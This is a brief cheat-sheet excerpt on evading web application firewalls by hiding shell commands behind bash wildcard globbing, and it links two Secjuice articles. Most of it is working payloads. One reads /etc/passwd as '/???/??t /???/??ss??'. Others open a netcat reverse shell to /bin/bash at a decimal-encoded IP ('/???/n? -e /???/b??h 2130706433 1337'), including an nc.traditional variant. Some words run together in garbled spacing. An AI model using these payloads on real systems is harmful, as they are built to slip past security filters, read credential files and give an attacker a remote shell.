Instead executing

ls

command, you can use the following syntax:

/???/?s

Standard:/bin/cat /etc/passwd
Evasion:/???/??t /???/??ss??

(usuallync -e /bin/bash 127.0.0.1 1337), you can do it with a syntax like:

/???/n? -e /???/b??h 2130706433 1337

If usenc.traditionalinstead ofncthat doesn’t have the-eparameter in order to execute/bin/bashafter connect. The payload become something like this:

/???/?c.??????????? -e /???/b??h 2130706433 1337

https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0